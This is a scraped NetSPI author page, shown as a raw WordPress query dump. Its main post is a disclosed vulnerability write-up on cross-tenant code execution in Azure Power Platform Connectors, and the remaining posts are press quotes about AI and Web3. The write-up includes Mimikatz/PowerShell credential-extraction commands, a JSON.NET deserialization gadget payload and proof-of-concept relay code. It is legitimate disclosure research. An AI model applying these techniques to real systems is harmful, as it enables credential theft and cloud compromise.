Nick Landers

Nick Landers is an expert on malware development, AI/ML, and offensive research. He founded the Dark Side Ops training courses and develops tooling, evasions, and strategies for offensive security operations.
More by Nick Landers
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}\"77\"{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}\"77\"{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 31572
                    [post_author] => 53
                    [post_date] => 2023-09-26 09:55:19
                    [post_date_gmt] => 2023-09-26 14:55:19
                    [post_content] => 




Watch Now

AI has taken the world by storm lately. From ChatGPT to automated spear phishing techniques, the security world has already seen changes in processes, automation, and threat detection - not to mention attack techniques! The recent surge of AI opens up opportunities for both defenders and adversaries alike. What can we build? What can we automate? How can we use AI to augment security to buy time and add another layer of defense to our enterprise?

In this AI-focused solutions forum, we’ll examine how AI will continue to change the security landscape. After all - tools for one are tools for many. Just as defenders benefit from AI capabilities, adversaries have found their own uses. Threat actors have found efficiencies using AI capabilities, from writing malware to discovering vulnerable systems. Defenders must be prepared for how AI will help bolster defenses while adversaries use it to ramp up their attacks.

Watch Nick Landers, VP of Research NetSPI, join the SANS team to discuss the risks, vulnerabilities, and benefits of rapidly introducing machine learning and artificial intelligence globally at the AI & ChatGPT Solutions Forum.

[wonderplugin_video iframe="https://youtu.be/lZCgXf3IW-U" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Artificial Intelligence & ChatGPT [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => artificial-intelligence-and-chatgpt [to_ping] => [pinged] => [post_modified] => 2023-12-05 10:25:00 [post_modified_gmt] => 2023-12-05 16:25:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31572 [menu_order] => 18 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29835 [post_author] => 77 [post_date] => 2023-03-30 08:00:00 [post_date_gmt] => 2023-03-30 13:00:00 [post_content] =>

Azure maintains a large suite of automation tools between Logic Apps and the Power Platform (Automate, Apps, BI). On-Prem Data Gateways extend some of these automations by allowing actions to be carried out by a connected agent installed locally in customer networks.  

Originally these gateways were just designed for Power BI and “personal use” only, but you can also connect them to an Azure tenant and make them available to the larger subscription. In essence, you can bind an on-prem data gateway to an Azure gateway1 resource, then leverage that on-prem data gateway in a limited set of Power Platform Connectors from Logic Apps. Microsoft maintains a list of these supported connectors in their documentation (we also queried support via APIs to verify its accuracy): 

  • Apache Impala 
  • BizTalk Server 
  • File System 
  • HTTP with Azure AD 
  • IBM DB2 / Informix / MQ
  • MySQL 
  • Oracle Database 
  • PostgreSQL 
  • SAP 
  • SharePoint Server
  • SQL Server 
  • Teradata 

Originally, we wanted to inspect how these logic apps interact with gateways and discover code execution opportunities from an Azure tenant into a host network. You might imagine the ability to access file data or force web requests on remote hosts as quite valuable to an attacker. However, our research led us in a more interesting direction that involved cross-tenant compromise in Power Platform Connectors hosted in Azure.

https://youtu.be/2kEHf9s596k

Installation Internals

The installation and setup of the gateway is straightforward. During the initial setup you’ll be prompted for account credentials, gateway name, and recovery key. After installation, the gateway should be bonded to the Power Platform, and you can verify its availability in the Admin Portal. Connecting the gateway to an Azure subscription does require you allocate a separate “On-Prem Gateway” object via the portal. It’s worth double checking your region and target subscription before the gateway object becomes available under “Installation Name”. 

On-premises data gateway portal in Azure.
Power Platform admin center showing gateway cluster: demo-gateway.
Subscription and instance details within Azure data gateway.

Back on the gateway host, a service for Microsoft.PowerBI.EnterpriseGateway.exe will be installed to run core functions. A configuration app EnterpriseGatewayConfigurator.exe is available to view the status of the service, reconfigure parameters, run diagnostics, etc. Underneath their relationship is backed by a localhost WCF TCP ServiceHost (IGatewayConfigurationService) using a ServiceAuthorizationManager to limit access to administrators. 

Any curiosity regarding the “recovery key” we supplied is well founded. Gateways support both symmetric and asymmetric encryption to securely transfer sensitive credentials. When registering the gateway, the recovery key will be used to derive a symmetric key stored by the gateway host. Random bytes will be encrypted with this key and attached to an annotation field on the gateway object in the Power Platform (referred to as a “witness string”). This allows client-side verification of a matching key during recovery/change operations. In addition to symmetric material, an RSA keypair will be generated by the service and the public component will be transferred during creation. As clarified by Microsoft, the symmetric key is retained locally as a derivation of the recovery key value. 

We can see the client request to create the gateway here:

PUT /unifiedgateway/gateways/CreateGatewayWithApps HTTP/2 
Host: wabi-us-north-central-redirect.analysis.windows.net 
Authorization: Bearer [token] 

{ 
    "createGatewayRequest": { 
        "gatewayName": "demo-gateway", 
        "gatewayDescription": null, 
        "gatewayAnnotation": "{\"gatewayContactInformation\":[\"noexist@netspi.com\"],\"gatewayVersion\":\"3000.154.3\",\"gatewayWitnessString\":\"{\\\"EncryptedResult\\\":\\\"qAesqTDEw5WdQq[…]\\\",\\\"IV\\\":\\\"Zqq9Hc2qIFNzVOBEz5ymsg==\\\",\\\"Signature\\\":\\\"i9Urdz0HlpRBEuklU[…]\\\"}\",\"gatewayMachine\":\"DESKTOP-BDI31DO\",\"gatewaySalt\":\"51lQj3EFVfousJiQuSQdYQ==\",\"gatewayWitnessStringLegacy\":null,\"gatewaySaltLegacy\":null,\"gatewayDepartment\":null,\"gatewayVirtualNetworkSubnetId\":null}", 
        "gatewayPublicKey": "PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8UlNBUGFyYW1ldGVycyB4bWxuczp4c2Q9Imh0dHA[…]", 
        "gatewayVersion": "3000.154.3", 
        "gatewaySBDetails": null, 
        "gatewaySBDetailsSecondary": null, 
        "createSecondaryRelay": true 
    } 
}

The response to this request gives us additional context for how the gateway communicates with other components:

HTTP/2 200 OK 
Content-Type: application/json; charset=utf-8 
Requestid: f30a7f4a-8dea-4b66-abe3-430054f0ed72 

{ 
    "gatewayId": 3139190, 
    "gatewayObjectId": "7a67b558-5ec0-4588-8c97-c2dd8ee2fb1d", 
    "gatewayName": "demo-gateway", 
    "gatewayType": "Resource", 
    "gatewaySBDetails": { 
        "gatewaySBKey": "ABBBmLK2loqL7yY414H/X33xAADL3Q/QZPLeyxbb14=", 
        "gatewaySBKeyName": "ListenAccessKey", 
        "gatewaySBEndpoint": "sb://wabi-us-north-central-relay12.servicebus.windows.net/4ec23ba7-6ebd-4ab4-921a-5256e2a27a70/" 
    }, 
    "gatewaySBDetailsSecondary": null, 
    "deprecatedServiceBusNamespace": null, 
    "deprecatedServiceBusEndpoint": null, 
    "deprecatedServiceBusNamespaceSecondary": null, 
    "deprecatedServiceBusEndpointSecondary": null 
}

On-Prem Data Gateways leverage an allocated Azure Relay connection (gatewaySBDetails) to securely expose its service to the public cloud. This was formerly known as Service Bus Relay hence the Service Bus key names. This allows cloud resources to bind to the gateway as if it were another cloud service and issue data processing requests. Users can supply their own relay details, or have the Power Platform allocate one. This relationship is managed by the Microsoft.PowerBI.* libraries and leverages a NetTcpRelayBinding and ServiceHost to expose the gateway to the public cloud. You can think of this as a reverse proxy to the gateway host via Azure Relay. 

In terms of connecting to this Azure Relay, the key material is readily available to us by proxying web traffic during installation. However, inspecting the local storage of this data is also a valuable exercise. All sensitive config data is stored in "%LocalAppData%\Microsoft\On-premises data gateway\Gateway.bin" from the context of the service account. It’s a serialized JSON block with values protected by user-context DPAPI keys. We can perform a quick extraction using Mimikatz and Powershell: 

Extract the credentials and write blobs to disk: 

PS> $file = "C:\Windows\ServiceProfiles\PBIEgwService\AppData\Local\Microsoft\On-premises data gateway\Gateway.bin" 
PS> $creds = (cat $file | ConvertFrom-Json).credentials 
PS> $creds 

key               value 
---               ----- 
SBD               AQAAANCMnd8BFdERjHoA… 
SBDS              AQAAANCMnd8BFdERjHoA… 
SK                AQAAANCMnd8BFdERjHoA… 
LSK               AQAAANCMnd8BFdERjHoA… 
FileCredentialKey AQAAANCMnd8BFdERjHoA… 

PS> $creds | %{ [IO.File]::WriteAllBytes("$($_.key).bin", 
[Convert]::FromBase64String($_.value)) } 

Get the DPAPI_SYSTEM and service key with Mimikatz: 

PS> .\mimikatz.exe 
mimikatz # token::elevate 
mimikatz # lsadump::secrets 
mimikatz # dpapi::masterkey /in:"C:\Windows\ServiceProfiles\PBIEgwService\AppData\Roaming\Microsoft\Protect\[SID]\[KEY_GUID]" /system:[DPAPI_SYSTEM]

Decrypt the credential blobs:

mimikatz # dpapi::blob /in:SBD.bin /ascii 
mimikatz # dpapi::blob /in:SBDS.bin /ascii 
mimikatz # dpapi::blob /in:SK.bin /ascii 
mimikatz # dpapi::blob /in:LSK.bin /ascii 
mimikatz # dpapi::blob /in:FileCredentialKey.bin /ascii

The contents of FileCredentialKey give us the best context into the other values. The SBD blob is the allocated Azure Relay information from gateway creation, the SK blob is the symmetric key derived from the recovery value, and keyContainerName is the CSP name for our generated asymmetric key. With installation and some internals out the way, let’s move on to how data is serialized and passed on the relay.

{ 
    "id": 3139190, 
    "isDisconnected": true, 
    "objectId": "a9e6208f-669f-412f-a542-a4538121c38b", 
    "backendUri": "https://wabi-us-north-central-redirect.analysis.windows.net/", 
    "keyContainerName": "OdgAsymmetricKey", 

    "serviceBusDetails": {"index": "SBD"}, 
    "serviceBusDetailsSecondary": {"index": "SBDS"}, 
    "symmetricKey": {"index": "SK"}, 
    "legacySymmetricKey": {"index": "LSK"} 
}

Type Handling and Binders

The interface exposed on the relay backed ServiceHost is very simple. It’s essentially a single TransferAsync function on the gateway side and a callback contract for replying (TransferCallbackAsync). Both functions take a single byte array as their argument.

public interface IGatewayTransferCallback 
{ 
    [OperationContract(IsOneWay = true)] 
    Task TransferCallbackAsync(byte[] packet); 
} 

[ServiceContract(CallbackContract = typeof(IGatewayTransferCallback))] 
public interface IGatewayTransferService 
{ 
    [OperationContract(IsOneWay = true)] 
    Task PingAsync(); 

    [OperationContract(IsOneWay = true)] 
    Task TransferAsync(byte[] packet); 
}

The binary data passed to these functions is referred to as a Relay Packet. These packets are serialized binary data blocks, optionally compressed or chunked, and prefixed with a RelayPacketHeader to provide context.

[Flags] 
public enum ControlFlags : byte 
{ 
    None = 0, 
    EndOfData = 1, 
    HasTelemetry = 2, 
    HasCorrectDataSize = 4, 
} 

public enum XPress9Level 
{ 
    None = 0, 
    Level6 = 6, 
    Level9 = 9, 
} 

public enum DeserializationDirective 
{ 
    Json = 1, 
    BinaryRowset = 2, 
    BinaryVarData = 3, 
} 

[StructLayout(LayoutKind.Explicit, Size = 21, Pack = 1)] 
public sealed class RelayPacketHeader 
{ 
    private ControlFlags flags; 
    private int index; 
    private int uncompressedDataSize; 
    private int compressedDataSize; 
    private XPress9Level compressionAlgorithm; 
    private DeserializationDirective deserializationDirective; 
}

We are predominantly concerned with the Json deserialization directive, which is supported by standard JSON.NET (Newtonsoft) libraries. The inspection of core deserialization code leads us to an extremely concerning TypeNameHandling.All configuration.

static T JsonDeserialize<T>(string payload) where T : class 
{ 
    JsonSerializerSettings settings = new JsonSerializerSettings() 
    { 
        TypeNameHandling = TypeNameHandling.All, 
        SerializationBinder = (ISerializationBinder)new DataMovementSerializationBinder() 
        // ... 
    }; 

    return JsonConvert.DeserializeObject<T>(payload, settings); 
}

It would appear some considerations are made for type security. The DataMovementSerializationBinder is applied to check incoming type names for validity. However, the use of serialization binders for security is not recommended and this binder is a great example of why. 

We’ve extracted just a small snippet of the decompiled source, but the relevant weakness is the allow listing of any types from PowerBI, DataMovement, and Mashup assemblies in IsAcceptableAssemblyName regardless of the specific type. 

public Type BindToType(string assemblyName, string typeName) { 
    if (this.IsAcceptableBasicTypeName(typeName) ||  
        this.IsAcceptableAssemblyName(assemblyName) || 
        this.IsAcceptableDictionaryType(typeName) ||  
        this.IsAcceptableMscorlibException(assemblyName, typeName) 
    ) { 
        return this.serializationBinder.BindToType(assemblyName, typeName); 
    } 

    return null; 
} 

private bool IsAcceptableAssemblyName(string assemblyName) { 
    return assemblyName.StartsWith("Microsoft.PowerBI") ||  
        assemblyName.StartsWith("Microsoft.DataMovement") ||  
        assemblyName.StartsWith("Microsoft.Mashup") ||  
        assemblyName.StartsWith("Microsoft.Data.Mashup"); 
}

A quick scan of available types leads us to Microsoft.Mashup.Storage.SerializableDictionary, an overload of a standard Dictionary class with a controllable value type that won’t be checked. We also need to find a vulnerable object tree that types some property as a generic Object to bypass IsAssignableTo checks, but that's also quite trivial. Ultimately Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest with a nested Microsoft.Mashup.Storage.SerializableDictionary for our WindowsIdentity gadget gets the job done: 

{ 
  '$type': 'Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest, Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts', 
  'request': { '$type': 'System.Byte[], mscorlib', '$value': '/w==' }, 
  'property': { 
    '$type': 'System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib', 
    'foo': { 
      '$type': 'Microsoft.Mashup.Storage.SerializableDictionary`2[[System.String, mscorlib],[System.Security.Principal.WindowsIdentity, mscorlib]], Microsoft.MashupEngine', 
      'bar': { 
        'System.Security.ClaimsIdentity.actor': '**PAYLOAD**' 
      } 
    } 
  } 
}

Return to Sender

We now have the primitive necessary to exploit processing code on either end of the Azure Relay for code execution. We could attempt to target the gateway itself but gaining remote access to the required access keys makes this a very limited attack vector. However, going the other way is much more interesting. The Power Platform runtime, which puts messages on the relay, likely leverages the same serialization code and we already understand how to communicate on the relay. 

We can now leverage a minimal Azure relay client to bind to the cloud and wait for tasking. When a Power Platform Connector communicates with the gateway, we can wrap our serialization payload in a RelayPacketHeader and deliver it using TransferCallbackAsync. Getting the Power Platform to communicate with the fake gateway is straightforward. We set up a fresh Logic App, select one of the on-prem supported connectors, and trigger any activity against our gateway (test connection, store credentials, query data, etc.). You can find the proof-of-concept on Github and the relevant code below.

class GatewayTransferService : IGatewayTransferService 
{ 
    public Task PingAsync() { 
        return new Task(() => {}); 
    } 

    public Task TransferAsync(byte[] bytes) 
    { 
        string Payload = "..."; 

        var response = Encoding.Unicode.GetBytes(Payload); 
        byte[] responseBytes = new byte[response.Length + RelayPacketHeader.Size]; 

        new RelayPacketHeader() 
        { 
            HasCorrectDataSize = true, 
            IsLast = true, 
            Index = 0, 
            UncompressedDataSize = response.Length, 
            CompressedDataSize = response.Length, 
            CompressionAlgorithm = XPress9Level.None, 
            DeserializationDirective = DeserializationDirective.Json 
        }.Serialize(responseBytes); 

        Array.Copy((Array)response, 0, (Array)responseBytes, RelayPacketHeader.Size, response.Length); 

        IGatewayTransferCallback callback = OperationContext.Current.GetCallbackChannel<IGatewayTransferCallback>(); 
        return callback.TransferCallbackAsync(responseBytes); 
    } 
} 

// ... 

// Force the relay listener to connect out over HTTP(S) rather than raw TCP,
// which traverses restrictive egress firewalls more reliably.
ServiceBusEnvironment.SystemConnectivity.Mode = ConnectivityMode.Http; 

// Host our fake-gateway service implementation defined above.
ServiceHost serviceHost = new ServiceHost(typeof(GatewayTransferService)); 

// Bind the gateway transfer contract to the Azure Relay endpoint. IsDynamic=false
// keeps the relay binding static; authentication uses the shared-access key
// (KeyName/Key) for the relay namespace.
serviceHost.AddServiceEndpoint( 
    typeof(IGatewayTransferService), 
    new NetTcpRelayBinding() { IsDynamic = false }, 
    Endpoint 
).Behaviors.Add( 
    new TransportClientEndpointBehavior { 
        TokenProvider = TokenProvider.CreateSharedAccessSignatureTokenProvider(KeyName, Key) 
    } 
); 

// Open the listener and wait for the Power Platform to task us.
serviceHost.Open();
Logic Apps Designer showing the Power Platform application.

Depending on the connector used, different backends will process the final payload. Initially we delivered various exploratory payloads using various connectors, which in turn would exfiltrate environmental data to an Azure Function App. We selected the most promising backend without additional obvious sandboxing (HTTP w/ Azure AD) and deployed a full stage 2 agent into memory (Slingshot). We achieved SYSTEM access, and the execution environment was clearly deep inside first-party Power Platform services in Azure.  

From the compromised host, the IMDS endpoint granted access to an authentication token for various key vault secrets and keys. We retrieved fabric configuration files, tenant information, and access to managed identities. From the decrypted Azure VM extension settings, we were able to identify Storage Account keys along with several valid SAS token Storage Account URLs configured with long expiration durations (~3 months) and the ability to list and read files (sp=rl). Overall, we calculated access to at least 1,300 secrets/certs over ~180 vaults. When it was clear cross-tenant access was possible, we burned off the affected hosts and a full report was delivered to MSRC.

Screenshot showing code execution on power platform connectors host.
Screenshot showing cross-tenant access in Azure.
Screenshot showing cross-tenant access in Azure.

Conclusion

Microsoft fixed this issue by completely rebuilding their serialization binder to enforce much stricter type allow list. They also appear to have distinct binders for both the gateway and cloud sides, but safe serialization in such a complex system clearly remains a tricky task even for Microsoft. There are many areas of related research that we didn’t get to. The Power Platform and its relationship to Azure is rich in technical complexity. I’m sure a motivated researcher could yield more interesting results from the execution of requests in the client, individual logic app functionality, gateway APIs, and data sanitization. As we also discovered, different logic apps appeared to be supported by an array of backend systems with different configurations, isolations, and intents. I hope this post can inspire fresh eyes to look at these systems more. 

Appendix A – Disclosure Timeline 

  • September 2022: Report filed with MSRC. 
  • October 2022: MSRC opens case 75270 and additional details are provided. 
  • October 2022: Call with MSRC stakeholders to demonstrate vulnerability. 
  • November 2022: Fix is deployed to public cloud. 
  • December 2022: Fix is deployed to all remaining regions. 

Appendix B – References 

[post_title] => Riding the Azure Service Bus (Relay) into Power Platform [post_excerpt] => NetSPI discovered a remote code execution vulnerability in Power Platform Connectors that allowed access to cross-tenant data. This issue was resolved with the help of MSRC teams at Microsoft. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-service-bus-power-platform [to_ping] => [pinged] => [post_modified] => 2023-03-30 13:32:28 [post_modified_gmt] => 2023-03-30 18:32:28 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29835 [menu_order] => 116 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29416 [post_author] => 77 [post_date] => 2023-02-09 09:00:00 [post_date_gmt] => 2023-02-09 15:00:00 [post_content] =>

On February 9, NetSPI's Nick Landers and Nabil Hannan were featured in the Digital Journal article called What Cybersecurity Risk to AI Chatbots Pose?. Read the preview below or view it online.

+++

ChatGPT is a tool from OpenAI that enables a person to type natural-language prompts. To this, ChatGPT offers conversational, if somewhat stilted, responses. The potential of this form of ‘artificial intelligence’ is, nonetheless, considerable.

Google is launching Bard A.I. in response to ChatGPT and Microsoft is following closely with an application called Redmond.

What do these tools mean for the expanding threat landscape? To find out, Digital Journal sought the opinions of two NetSPI representatives.

First is Nabil Hannan, Managing Director at NetSPI. According to Hannan businesses seeking to adopt the technology need to stand back and consider the implications: “With the likes of ChatGPT, organizations have gotten extremely excited about what’s possible when leveraging AI for identifying and understanding security issues—but there are still limitations. Even though AI can help identify and triage common security bugs faster – which will benefit security teams immensely – the need for human/manual testing will be more critical than ever as AI-based penetration testing can give organizations a false sense of security.”

Hannan adds that things can still go wrong, and that AI is not perfect. This could, if unplanned, impact on a firm’s reputation. Hannan adds: “In many cases, it may not produce the desired response or action because it is only as good as its training model, or the data used to train it. As more AI-based tools emerge, such as Google’s Bard, attackers will also start leveraging AI (more than they already do) to target organizations. Organizations need to build systems with this in mind and have an AI-based “immune system” (or something similar) in place sooner rather than later, that will take AI-based attacks and automatically learn how to protect against them through AI in real-time.”

The second commentator is Nick Landers, VP of Research at NetSPI.

Landers looks at wider developments, noting: “The news from Google and Microsoft is strong evidence of the larger shift toward commercialized AI. Machine learning (ML) and AI have been heavily used across technical disciplines for the better part of 10 years, and I don’t predict that the adoption of advanced language models will significantly change the AI/ML threat landscape in the short term – any more than it already is. Rather, the popularization of AI/ML as both a casual conversation topic and an accessible tool will prompt some threat actors to ask, “how can I use this for malicious purposes?” – if they haven’t already.”

What does this mean for cybersecurity? Landers’ view is: “The larger security concern has less to do with people using AI/ML for malicious reasons and more to do with people implementing this technology without knowing how to secure it properly.”

He adds: “In many instances, the engineers deploying these models are disregarding years of security best practices in their race to the top. Every adoption of new technology comes with a fresh attack surface and risk. In the vein of leveraging models for malicious content, we’re already starting to see tools to detect generated content – and I‘m sure similar features will be implemented by security vendors throughout the year.”

Landers concludes, offering: “In short, AI/ML will become a tool leveraged by both offensive and defensive actors, but defenders have a huge head start at present. A fresh cat-and-mouse game has already begun with models detecting other models, and I’m sure this will continue. I would urge people to focus on defense-in-depth with ML as opposed to the “malicious actors with ChatGPT AI” narrative.”

Read the article at Digital Journal!

[post_title] => Digital Journal: What Cybersecurity Risk do AI Chatbots Pose? [post_excerpt] => NetSPI's Nick Landers and Nabil Hannan shared insights on what AI tools ChatGPT and Bard A.I. and mean for the expanding threat landscape. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => digital-journal-cybersecurity-risks-ai [to_ping] => [pinged] => [post_modified] => 2023-03-10 09:02:24 [post_modified_gmt] => 2023-03-10 15:02:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29416 [menu_order] => 134 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 29382 [post_author] => 77 [post_date] => 2023-02-06 09:00:00 [post_date_gmt] => 2023-02-06 15:00:00 [post_content] =>

On February 6, NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | The Coming of Web3. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | The Coming of Web3 – Web3 is a term that has been hijacked for marketing purposes. Since web3 obviously represents the future internet, claiming to be web3 now is a claim to be the future today. Such claims should be viewed with caution – we don’t yet know what web3 will be.

Two of the biggest culprits are the cryptocurrency and NFT investment industries, which both use blockchains. They have claimed to be web3 so vociferously that some pundits believe that web3 is blockchain. This is way too simplistic – these are just applications running on one technology that may become one of the web3 building blocks. 

Before we discuss the evolution of, and issues with, web3 in 2023 and beyond, we’ll first define one specific view of its basics. 

Financial institutions 

Since the blockchain was originally developed for use in the finance sector, it should be no surprise that the finance industry is one of the more interested sectors. “There is a major trend of blockchain adoption in large financial institutions,” says Nick Landers, director of research at NetSPI, specifically citing Broadridge, Citi and BNY Mellon. 

“The primary focus,” he continued, “is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. Despite what popular culture would indicate, the business use cases for blockchain technology will likely deviate starkly from popularized tokens and NFTs.” Instead, he believes, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in proof-of-stake chains.

By the end of next year, he expects that every major financial institution will have announced adoption of blockchain technology, if it hasn’t already. “While Ethereum, EVM, and Solidity-based smart contracts have received a huge portion of the security research, nuanced technologies like Hyperledger Fabric have received much less. In addition, the supported features in these business-focused private chain technologies differ significantly from their public counterparts.” 

It is worth noting that private blockchains are not decentralized blockchains – which begs the question, are they really web3?

Either way, this ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. “If you thought that blockchain is ‘secure by default’,” added Landers, “think again. Just like cloud platform adoption, we’ll see the promises of ‘secure by default’ fall away as unique attack paths and vulnerabilities are discovered in the nuances of this technology.”

Read the full article at SecurityWeek!

[post_title] => SecurityWeek: Cyber Insights 2023 | The Coming of Web3 [post_excerpt] => NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | The Coming of Web3 [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-web3 [to_ping] => [pinged] => [post_modified] => 2023-02-16 17:28:17 [post_modified_gmt] => 2023-02-16 23:28:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29382 [menu_order] => 137 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 29374 [post_author] => 77 [post_date] => 2023-01-31 09:00:00 [post_date_gmt] => 2023-01-31 15:00:00 [post_content] =>

On January 31, NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | Artificial Intelligence. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Artificial Intelligence – The pace of artificial intelligence (AI) adoption is increasing throughout industry and society. This is because governments, civil organizations and industry all recognize greater efficiency and lower costs available from the use of AI-generated automation. The process is irreversible.

What is still unknown is the degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool for beneficial improvement. That day is coming and will begin to emerge from 2023.

The changing nature of AI (from anomaly detection to automated response) 

Over the last decade, security teams have largely used AI for anomaly detection; that is, to detect indications of compromise, presence of malware, or active adversarial activity within the systems they are charged to defend. This has primarily been passive detection, with responsibility for response in the hands of human threat analysts and responders. This is changing. Limited resources which will worsen in the expected economic downturn and possible recession of 2023 is driving a need for more automated responses. For now, this is largely limited to the simple automatic isolation of compromised devices; but more widespread automated AI-triggered responses are inevitable.

Failure in AI is generally caused by an inadequate data lake from which to learn. The obvious solution for this is to increase the size of the data lake. But when the subject is human behavior, that effectively means an increased lake of personal data and for AI, this means a massively increased lake more like an ocean of personal data. In most legitimate occasions, this data will be anonymized but as we know, it is very difficult to fully anonymize personal information.

